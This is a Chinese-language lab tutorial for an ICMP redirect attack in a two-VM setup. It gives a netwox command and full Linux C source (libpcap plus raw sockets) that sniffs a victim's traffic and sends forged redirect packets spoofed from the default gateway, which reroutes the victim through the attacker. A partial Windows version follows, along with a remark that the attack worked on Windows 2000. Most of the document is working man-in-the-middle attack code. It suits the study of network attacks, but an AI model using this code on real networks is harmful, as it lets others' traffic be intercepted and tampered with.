ICMP重定向 Redirect netwox libpcap netwag
搭建环境
两台虚拟机。
攻击者:192.168.1.8
被攻击者:192.168.1.9
网络配置
主机均采用DHCP
如果没有路由器,可以使用NAT模式来做
攻击者配置
打开转发数据包功能
# sudo sysctl net.ipv4.ip_forward=1
安装攻击软件netwox
# sudo apt-get install netwox
被攻击者配置
安装抓包软件Wireshark
# sudo apt-get install wireshark
注意:启动时,也要用root权限
开始攻击
# sudo netwox 86 -d "eth0" -g "192.168.1.8" -i "192.168.1.1"
-g:攻击者IP
-i:默认网关IP
查看攻击状态
攻击者伪造默认网关192.168.1.1发送重定向数据包,欺骗192.168.1.9向新的网关192.168.1.8转发数据包
被攻击者路由跟踪
linux攻击
#include <pcap.h>
#include <time.h>
#include <stdlib.h>
#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#define MAX 1024
#define SIZE_ETHERNET 14
#define ICMP_ECHOREPLY 0 /* Echo Reply */
#define ICMP_DEST_UNREACH 3 /* Destination Unreachable */
#define ICMP_SOURCE_QUENCH 4 /* Source Quench */
#define ICMP_REDIRECT 5 /* Redirect (change route) */
#define ICMP_ECHO 8 /* Echo Request */
#define ICMP_TIME_EXCEEDED 11 /* Time Exceeded */
#define ICMP_PARAMETERPROB 12 /* Parameter Problem */
#define ICMP_TIMESTAMP 13 /* Timestamp Request */
#define ICMP_TIMESTAMPREPLY 14 /* Timestamp Reply */
#define ICMP_INFO_REQUEST 15 /* Information Request */
#define ICMP_INFO_REPLY 16 /* Information Reply */
#define ICMP_ADDRESS 17 /* Address Mask Request */
#define ICMP_ADDRESSREPLY 18 /* Address Mask Reply */
#define NR_ICMP_TYPES 18
/* Codes for REDIRECT. */
#define ICMP_REDIR_NET 0 /* Redirect Net */
#define ICMP_REDIR_HOST 1 /* Redirect Host */
#define ICMP_REDIR_NETTOS 2 /* Redirect Net for TOS */
#define ICMP_REDIR_HOSTTOS 3 /* Redirect Host for TOS */
const unsigned char *Vic_IP = "192.168.1.9"; //攻击对象的ip
const unsigned char *Ori_Gw_IP = "192.168.1.1"; //源网关ip。必须要填默认网关IP
const unsigned char *Redic_IP = "192.168.1.8"; //攻击者ip
int flag = 0;
#define __LITTLE_ENDIAN_BITFIELD
struct iphdr
{
#if defined(__LITTLE_ENDIAN_BITFIELD)
unsigned char ihl:4,
version:4;
#else
unsigned char version:4,
ihl:4;
#endif
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned int saddr;
unsigned int daddr;
/*The options start here. */
};
struct icmphdr
{
unsigned char type;
unsigned char code;
unsigned short checksum;
union
{
struct
{
unsigned short id;
unsigned short sequence;
} echo;
unsigned int gateway;
struct
{
unsigned short __unused;
unsigned short mtu;
} frag;
} un;
};
/*计算校验和*/
u_int16_t checksum(u_int8_t *buf, int len)
{
u_int32_t sum = 0;
u_int16_t *cbuf;
cbuf = (u_int16_t *)buf;
while(len > 1)
{
sum += *cbuf++;
len -= 2;
}
if(len)
{
sum += *(u_int8_t *)cbuf;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void ping_redirect(int sockfd, const unsigned char *data, int datalen)
{
char buf[MAX], *p;
int len, i;
struct packet
{
struct iphdr ip;
struct icmphdr icmp;
char datas[28];
} packet;
//手动填充ip头
packet.ip.version = 4;
packet.ip.ihl = 5;
packet.ip.tos = 0; //服务类型
packet.ip.tot_len = htons(sizeof(packet));
packet.ip.id = getpid();
packet.ip.frag_off = 0;
packet.ip.ttl = 255;
packet.ip.protocol = IPPROTO_ICMP;
packet.ip.check = 0;
packet.ip.saddr = inet_addr(Ori_Gw_IP); //要伪造网关发送ip报文
packet.ip.daddr = inet_addr(Vic_IP); //将伪造重定向包发给受害者
//手动填充icmp头
packet.icmp.type = ICMP_REDIRECT;
packet.icmp.code = ICMP_REDIR_HOST;
packet.icmp.checksum = 0;
packet.icmp.un.gateway = inet_addr(Redic_IP);
struct sockaddr_in dest =
{
.sin_family = AF_INET,
.sin_addr = {
.s_addr = inet_addr(Vic_IP)
}
};
packet.ip.check = checksum((u_int8_t *)&packet.ip, sizeof(packet.ip));
//从源数据包的内存地址的起始地址开始,拷贝28个字节到目标地址所指的起始位置中
memcpy(packet.datas, (data + SIZE_ETHERNET), sizeof(packet.datas)); //包里数据
packet.icmp.checksum = checksum((u_int8_t *)&packet, sizeof(packet));
//用于非可靠连接的数据数据发送,因为UDP方式未建立SOCKET连接,所以需要自己制定目的协议地址
//(发送端套接字描述符,待发送数据的缓冲区,待发送数据长度IP头+ICMP头(8)+IP首部+IP前8字节,flag标志位,一般为0,数据发送的目的地址,地址长度)
sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&dest, sizeof(dest));
close(sockfd);
}
//pcap_loop()不知道如何处理返回值,所以返回值为空,第一个参数是回调函数的最后一个参数,第二个参数是pcap.h头文件定义的,包括数据包被嗅探的时间大小等信息,最后一个参数是一个u_char指针,它包含被pcap_loop()嗅探到的所有包(一个包包含许多属性,它不止一个字符串,而是一个结构体的集合,如一个TCP/IP包包含以太网头部,一个IP头部还有TCP头部,还有此包的有效载荷)这个u_char就是这些结构体的串联版本。pcap嗅探包时正是用之前定义的这些结构体
void getPacket(u_char *arg, const struct pcap_pkthdr *pkthdr, const u_char *packet)
{
int sockfd, res;
int one = 1;
int *ptr_one = &one;
printf("len %d\n", pkthdr->len);
//可以接收协议类型为ICMP的发往本机的IP数据包(通信的域,iPv4,套接字通信的类型,原始套接字,套接字类型,接收ICMP-》IP)
//sockfd是socket描述符,为了以后将socket与本机端口相连
if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0)
{
printf("create sockfd error\n");
exit(-1);
}
//包装自己的头部
//发送数据时,不执行系统缓冲区到socket缓冲区的拷贝,以提高系统性能,应为
/**
设置sockfd套接字关联的选 项
sockfd:指向一个打开的套接口描述字
IPPROTO_IP:指定选项代码的类型为IPV4套接口
IP_HDRINCL:详细代码名称(需要访问的选项名字)
ptr_one:一个指向变量的指针类型,指向选项要设置的新值的缓冲区
sizeof(one):指针大小
*/
res = setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one));
if(res < 0)
{
printf("error--\n");
exit(-3);
}
ping_redirect(sockfd, packet, 0);
}
int main(int argc, char **argv)
{
char errBuf[PCAP_ERRBUF_SIZE], * devStr;
/* get a device */
devStr = pcap_lookupdev(errBuf);//返回一个合适网络接口的字符串指针,如果出错,则返回errBuf出错字符串,长度为PACP_ERRBUF_SIZE长度
if(devStr)
{
printf("success: device: %s\n", devStr);
}
else
{
printf("pcap_lookupdev error: %s\n", errBuf);
exit(1);
}
/* open a device, wait until a packet arrives */
//打开设备进行嗅探,返回一个pcap_t类型的指针,后面操作都要用到这个指针
pcap_t *device = pcap_open_live(devStr, 65535, 1, 0, errBuf); //获得数据包捕获描述字函数(设备名称,参与定义捕获数据的最大字节数,是否置于混杂模式,设置超时时间0表示没有超时等待,errBuf是出错返回NULL时用于传递错误信息)
if(device == NULL)
{
printf("pcap_open_live error: %s\n", errBuf);
return -1;
}
struct bpf_program filter;
bpf_u_int32 netmask = 0xffffff;
char filterstr[50] = {0};
sprintf(filterstr, "src host %s", Vic_IP); //将vic_ip按照%s的格式写入filterstr缓冲区
//过滤通信,哪些包是用户可以拿到的
//表达式被编译,编译完就可使用了
if(pcap_compile(device, &filter, filterstr, 1, netmask) < 0) //函数返回-1为失败,返回其他值为成功
{
printf("pcap_compile error: %s\n", errBuf);
return -1;
}
//device:会话句柄
//&filterstr:被编译的过滤器版本的地址的引用
//filterstr:表达式本身,存储在规定的字符串格式里
//1:表达式是否被优化的整形量:0:没有,1:有
//0:指定应用此过滤器的网络掩码
//设置过滤器,使用这个过滤器
pcap_setfilter(device, &filter);
//device:会话句柄
//&filterstr:被编译的表达式版本的引用
/* wait loop forever */
int id = 0;
pcap_loop(device, -1, getPacket, NULL);
//device是之前返回的pacp_t类型的指针,-1代表循环抓包直到出错结束,>0表示循环x次,getPacket是回调函数,最后一个参数一般之置为null
return 0;
}
Windows攻击
#pragma pack (1)
typedef struct
{
EthernetHeader ed;
IPV4_HDR ip;
ICMPHeader icmp;
u_char data[28];
}IcmpPacket;
#pragma pack ()
void icmpRedirect(const u_char *pktData)
{
IcmpPacket packet;
memset((void *)&packet, 0, sizeof(packet));
//EthernetHeader
memcpy(packet.ed.SourMAC, this->hostInfo->mac, sizeof(packet.ed.SourMAC));
memcpy(packet.ed.DestMAC, this->destMac, sizeof(packet.ed.DestMAC));
packet.ed.EthType = htons(IP_TYPE);
//IP
packet.ip.ip_version = 4;
packet.ip.ip_header_len = 5;
packet.ip.ip_tos = 0;
packet.ip.ip_total_length = htons(sizeof(packet) - sizeof(EthernetHeader)); //不包含以太网头
packet.ip.ip_id=htons(2);
packet.ip.ip_frag_offset = 0;
packet.ip.ip_frag_offset1 = 0;
packet.ip.ip_reserved_zero = 0;
packet.ip.ip_dont_fragment = 1;
packet.ip.ip_more_fragment = 0;
packet.ip.ip_ttl = 8;
packet.ip.ip_protocol = IPPROTO_ICMP;
packet.ip.ip_checksum = 0;
packet.ip.ip_srcaddr = inet_addr(this->hostInfo->gatewayIp);//要伪造网关发送ip报文
packet.ip.ip_destaddr = inet_addr(this->destIp.toLatin1().data());//将伪造重定向包发给受害者
//qDebug() << "packet.ip.saddr" << packet.ip.saddr;
//qDebug() << "packet.ip.daddr" << packet.ip.daddr;
//qDebug() << "sizeof(packet.ip)" << sizeof(packet.ip);
//ICMP
packet.icmp.type = ICMP_REDIRECT;
packet.icmp.code = ICMP_REDIR_HOST;
packet.icmp.checkSum = 0;
//qDebug() << "hostInfo->ip" << this->hostInfo->ip;
u_long nSourceIp = inet_addr(this->hostInfo->ip); //攻击者ip
packet.icmp.un.gateway = nSourceIp;
//从源数据包的内存地址的起始地址开始,拷贝28个字节到目标地址所指的起始位置中
memcpy(packet.data,pktData+ETHERNET_HEAD_LENGTH,sizeof(packet.data));
packet.ip.ip_checksum = pcap.checksum(&packet.ip, sizeof(packet.ip));
packet.icmp.checkSum = pcap.checksum((u_char*)&packet + sizeof(EthernetHeader), sizeof(packet) - sizeof(EthernetHeader)); //不包含以太网头
//发送
if (pcap_sendpacket(this->adhandle, // Adapter
&packet, // buffer with the packet
sizeof(packet) // size
) != 0)
{
qDebug("\nError sending the packet: %s\n", pcap_geterr(this->adhandle));
return;
}
}
备注:
测试过,攻击Windows 2000虚拟机是可以成功的
